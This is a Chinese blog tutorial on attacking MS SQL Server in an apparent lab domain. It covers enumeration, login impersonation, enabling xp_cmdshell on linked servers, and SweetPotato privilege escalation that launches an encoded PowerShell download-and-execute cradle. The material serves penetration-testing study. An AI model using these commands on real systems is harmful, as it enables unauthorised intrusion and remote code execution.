MS SQL Server攻击面

admin 2024年10月7日18:05:37评论8 views字数 6416阅读21分23秒阅读模式

前言

微软SQL Server是一个关系型数据库依赖于windows环境,通常用于支持一些商业功能。除了这些功能之外,SQL Server还具有非常大的攻击面,比如命令执行,权限提升,横行移动以及权限维持。

正文

PowerUpSQL和SQLRecon是两款非常优秀的工具用于和SQL Server交互。

Get-SQLInstanceDomain的工作原理是搜索以MSSQL开头的SPN。

这个数据表明SQL-2运行在SQL Server,用户是mssql_svc域账户。

beacon> powershell-import C:ToolsPowerUpSQLPowerUpSQL.ps1
beacon> powershell Get-SQLInstanceDomain

ComputerName     : sql-2.dev.cyberbotic.io
Instance         : sql-2.dev.cyberbotic.io,1433
DomainAccountSid : 1500000521000672332383313895871914512914091400
DomainAccount    : mssql_svc
DomainAccountCn  : MS SQL Service
Service          : MSSQLSvc
Spn              : MSSQLSvc/sql-2.dev.cyberbotic.io:1433
LastLogon        : 8/15/2022 7:55 PM
Description      :

Get-SQLConnectionTest可以用来测试我们能是否能连接数据库

beacon> powershell Get-SQLConnectionTest -Instance "sql-2.dev.cyberbotic.io,1433" | fl

ComputerName : sql-2.dev.cyberbotic.io
Instance : sql-2.dev.cyberbotic.io,1433
Status : Accessible

Get-SQLServerInfo可以用来收集关于这个数据库的更多信息

beacon> powershell Get-SQLServerInfo -Instance "sql-2.dev.cyberbotic.io,1433"

ComputerName : sql-2.dev.cyberbotic.io
Instance : SQL-2
DomainName : DEV
ServiceProcessID : 2668
ServiceName : MSSQLSERVER
ServiceAccount : DEVmssql_svc
AuthenticationMode : Windows Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Standard Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : DEVbfarmer
IsSysadmin : No
ActiveSessions : 1

可以通过下面这个命令进行在多实例当中收集信息

powershell Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

SQLRecon可以判断我们的用户是什么权限

beacon> execute-assembly C:ToolsSQLReconSQLReconbinReleaseSQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m whoami

[+] Logged in as:
DEVbfarmer

[+] Mapped to the user:
guest

[+] Roles:
User is a member of public role
User is NOT a member of db_owner role
User is NOT a member of db_accessadmin role
User is NOT a member of db_securityadmin role
User is NOT a member of db_ddladmin role
User is NOT a member of db_backupoperator role
User is NOT a member of db_datareader role
User is NOT a member of db_datawriter role
User is NOT a member of db_denydatareader role
User is NOT a member of db_denydatawriter role
User is NOT a member of sysadmin role
User is NOT a member of setupadmin role
User is NOT a member of serveradmin role
User is NOT a member of securityadmin role
User is NOT a member of processadmin role
User is NOT a member of diskadmin role
User is NOT a member of dbcreator role
User is NOT a member of bulkadmin role

of bulkadmin role

MS SQL允许我们通过使用其他用户的权限,当我们不知道这个用户密码的时候,如果我们配置了继承,通过搜索查找。

SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE';

然后通过搜索ID查找更多信息

SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals;

SQLRecon也支持查找SQL Server的继承

beacon> execute-assembly C:ToolsSQLReconSQLReconbinReleaseSQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m impersonate

[+] Enumerating accounts that can be impersonated on sql-2.dev.cyberbotic.io,1433:

name |
-------
DEVmssql_svc |

通过EXECUTE AS直接使用

EXECUTE AS login = 'DEVmssql_svc'; SELECT SYSTEM_USER;
DEVmssql_svc

EXECUTE AS login = 'DEVmssql_svc'; SELECT IS_SRVROLEMEMBER('sysadmin');
1

SQLRecon -i参数支持模拟用户

beacon> execute-assembly C:ToolsSQLReconSQLReconbinReleaseSQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m iwhoami -i DEVmssql_svc

[+] Logged in as:
DEVmssql_svc

[+] Mapped to the user:
dbo

[+] Roles:
User is a member of public role
User is a member of sysadmin role
User is a member of setupadmin role
User is a member of serveradmin role
User is a member of securityadmin role
User is a member of processadmin role
User is a member of diskadmin role
User is a member of dbcreator role
User is a member of bulkadmin role

XP_CMDSHELL可以用于执行在SQL Server当中执行命令,当拥有sysadmin权限的时候。PowerUpSQL中的Invoke-SQLOSCMD提供了这样的一个功能。

beacon> powershell Invoke-SQLOSCmd -Instance "sql-2.dev.cyberbotic.io,1433" -Command "whoami" -RawResults

devmssql_svc

枚举查询xp_cmdshell的配置

SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';

恢复XP_CMDSHELL

sp_configure 'Show Advanced Options', 1; RECONFIGURE;
sp_configure 'xp_cmdshell', 1; RECONFIGURE;

SQL Server支持通过一种链接的方法从 MS SQL Servers中获取数据。可以通过这种方法获取链接信息。

SELECT srvname, srvproduct, rpcout FROM master..sysservers;

通过OpenQuery查找链接

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');

检查xp_cmdshell

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');

通过下面的方式远程恢复

EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io] EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]

powershell Get-SQLServerLinkCrawl获取跟实例相关的链接

beacon> powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"

Version     : SQL Server 2019
Instance    : SQL-2
CustomQuery :
Sysadmin    : 1
Path        : {SQL-2}
User        : DEVbfarmer
Links       : {SQL-1.CYBERBOTIC.IO}

Version     : SQL Server 2019
Instance    : SQL-1
CustomQuery :
Sysadmin    : 1
Path        : {SQL-2, SQL-1.CYBERBOTIC.IO}
User        : sa
Links       :

这里面的例子运行在 SQL Server当中,这里有一个SelmpersonatePrivilege权限,这个权限允许模仿客户端当认证完成后。

beacon> getuid
[*] You are NT ServiceMSSQLSERVER

beacon> execute-assembly C:ToolsSeatbeltSeatbeltbinReleaseSeatbelt.exe TokenPrivileges

====== TokenPrivileges ======

Current Token's Privileges

SeAssignPrimaryTokenPrivilege: DISABLED
SeIncreaseQuotaPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED

[*] Completed collection in 0.037 seconds

但是因为原先的账号不是admin权限,所以它不能获取本地正在运行的SYSTEM权限进程。其中一个方法是强制启动一个系统服务认证攻击者的恶意服务,然后这个恶意服务就会获得SYSTEM权限。Sweetpotato就拥有这个功能,这里面是通过打印机漏洞,可以通过execute-assembly执行命令。

beacon> execute-assembly C:ToolsSweetPotatobinReleaseSweetPotato.exe -p C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -a "-w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGMAJwApAA=="

SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method PrintSpoofer to launch C:WindowsSystem32WindowsPowerShellv1.0powershell.exe
[+] Triggering notification on evil PIPE \sql-1/pipe/b888d569-b66e-4280-b8c5-995afbb9b02c
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

beacon> connect localhost 4444
[+] established link to child beacon: 10.10.120.25

原文始发于微信公众号(Th0r安全):MS SQL Server攻击面

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月7日18:05:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MS SQL Server攻击面https://cn-sec.com/archives/1971615.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息